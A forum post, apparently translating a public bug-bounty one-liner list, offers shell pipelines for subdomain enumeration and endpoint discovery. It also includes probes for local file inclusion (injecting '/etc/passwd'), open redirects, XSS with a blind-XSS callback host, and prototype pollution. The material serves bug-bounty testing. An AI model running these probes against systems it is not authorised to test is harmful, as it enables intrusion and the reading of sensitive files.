Some commands that improve efficiency when hunting for bugs

Posted on 2022-5-2 15:01:57
This post was last edited by PEnticE on 2022-5-2 15:16

Original source:
https://github.com/dwisiswant0/awesome-oneliner-bugbounty

Definitions
This section defines the specific terms or placeholders used throughout the one-liner commands/scripts.
    1.1. "HOST" defines a hostname, (sub)domain or IP address, e.g. replace it with internal.host, domain.tld, sub.domain.tld or 127.0.0.1.
    1.2. "HOSTS.txt" is a file containing more than one entry matching 1.1.
    2.1. "URL" defines a full URL, e.g. replace it with http://domain.tld/path/page.html, or anything that starts with the HTTP/HTTPS scheme.
    2.2. "URLS.txt" is a file containing more than one entry matching 2.1.
    3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script, depending on the context and need.
    4.1. "OUT.txt" or "OUT{N}.txt" means the output file in which the results of the executed command are stored.

Local File Inclusion @dwisiswant0
    gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open Redirect @dwisiswant0
    export LHOST="URL"; gau HOST | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

@N3T_hunt3r
    cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS @cihanmehmet
    gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

@fanimalikhack
    waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt


@oliverrickfors
    cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

Prototype Pollution @R0X4R
    subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

Find JavaScript Files @D0cK3rG33k
    assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

Extract Endpoints from JavaScript @renniepak
    cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
Get CIDR and Organization Information from a Target List @steve_mcilwain
    for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done

Get Subdomains from RapidDNS.io @andirrahmani1
    curl -s "https://rapiddns.io/subdomain/HOST?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run @_ayoubfathi_
    curl -s "https://dns.bufferover.run/dns?q=.HOST.com" | jq -r '.FDNS_A[]' | cut -d',' -f2 | sort -u

@AnubhavSingh_
    export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

Get Subdomains from Riddler.io @pikpikcu
    curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from VirusTotal @pikpikcu
    curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains with cyberxplore @pikpikcu
    curl "https://subbuster.cyberxplore.com/api/find?domain=HOST" -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter @caryhooper
    curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq '.[].dns_names' | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from the Web Archive @pikpikcu
    curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC @pikpikcu
    curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from SecurityTrails @pikpikcu
    curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

Bruteforcing Subdomains using DNS over HTTPS @pikpikcu
    while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

Subdomain Bruteforcer with FFUF @GochaOqradze
    ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find the Allocated IP Ranges of an ASN from an IP Address wains.be
    whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File @emenalf
    grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' FILE.txt

Find Subdomain Takeovers
    subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;

URL Probing with cURL + Parallel
    cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Now come the ones I personally find useful; pay attention. The list above is not complete; the full list is in the original. After translating it, I filtered out the commands that suit us.
Dump In-Scope Assets from chaos-bugbounty-list @dwisiswant0
    curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'


Dump In-Scope Assets from bounty-targets-data, HackerOne programs
    curl -sL "https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true" | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'


BugCrowd programs
    curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

There are some more in the original. HackerOne's assets are updated hourly, so you can diff them to pick up newly added program asset scopes.
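The scope diff mentioned above, as an added example that is not part of the original post or the bounty-targets-data project: it reads the same fields as the jq queries on this page (asset_identifier/asset_type for HackerOne, target/type for Bugcrowd) and reports which in-scope assets appeared or disappeared between two snapshots. The two snapshots are constructed sample data, not real program scope.

```python
import json

# Constructed sample snapshots in the bounty-targets-data layout that the
# page's jq queries read. They are not real program data.
OLD_SNAPSHOT = json.dumps([{
    "name": "Example Program",
    "targets": {"in_scope": [
        {"asset_identifier": "www.example.com", "asset_type": "URL"},
        {"asset_identifier": "api.example.com", "asset_type": "URL"},
    ], "out_of_scope": []},
}])

NEW_SNAPSHOT = json.dumps([{
    "name": "Example Program",
    "targets": {"in_scope": [
        {"asset_identifier": "www.example.com", "asset_type": "URL"},
        {"asset_identifier": "*.staging.example.com", "asset_type": "WILDCARD"},
    ], "out_of_scope": []},
}])


def in_scope_assets(snapshot_json):
    """Return the set of (program, identifier, type) tuples listed as in scope.

    Mirrors `.[].targets.in_scope[] | [.asset_identifier, .asset_type]` from
    the HackerOne one-liner and also accepts Bugcrowd's `target` / `type`.
    """
    assets = set()
    for program in json.loads(snapshot_json):
        for asset in program.get("targets", {}).get("in_scope", []):
            ident = asset.get("asset_identifier") or asset.get("target") or ""
            kind = asset.get("asset_type") or asset.get("type") or ""
            assets.add((program.get("name", ""), ident, kind))
    return assets


def diff_scope(old_json, new_json):
    """Compare two snapshots; return (added, removed) as sorted tuple lists."""
    old, new = in_scope_assets(old_json), in_scope_assets(new_json)
    return sorted(new - old), sorted(old - new)


if __name__ == "__main__":
    added, removed = diff_scope(OLD_SNAPSHOT, NEW_SNAPSHOT)
    for program, ident, kind in added:
        print(f"+\t{program}\t{ident}\t{kind}")
    for program, ident, kind in removed:
        print(f"-\t{program}\t{ident}\t{kind}")
```

To use it against live data, save the hourly download from the HackerOne one-liner to a file each time and pass the previous and current contents to diff_scope.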

Extract Endpoints from swagger.json @zer0pwn  The one I use most often
    curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

Find Hidden Servers and/or Admin Panels  This one depends on the wordlist
    ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt

When you use these tools, it is best to set up a server to configure the environment variables for your tools. I use CentOS and pull whatever is missing from yum. Or, if you have already configured the tools, make sure your commands can actually be invoked, such as the subfinder and ffuf above; otherwise they will error out. For the rest of the commands, see the original; they are reused less often.
Original source:
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
Contact me for removal in case of infringement. It is time for me to vent again: I have been hunting on HackerOne for a month and, wow, the duplicate rate is as high as 99%. Maybe I am just too bad at this. Yesterday a SQL injection in one feature was dismissed outright, which left me stunned; this morning I retested it and found it no longer worked. I ?????????? Another day of working hard to catch up with the big shots among my followers.
Too bad, too bad, too bad, bad enough to shut myself away, brothers. By the way, happy Labor Day, brothers.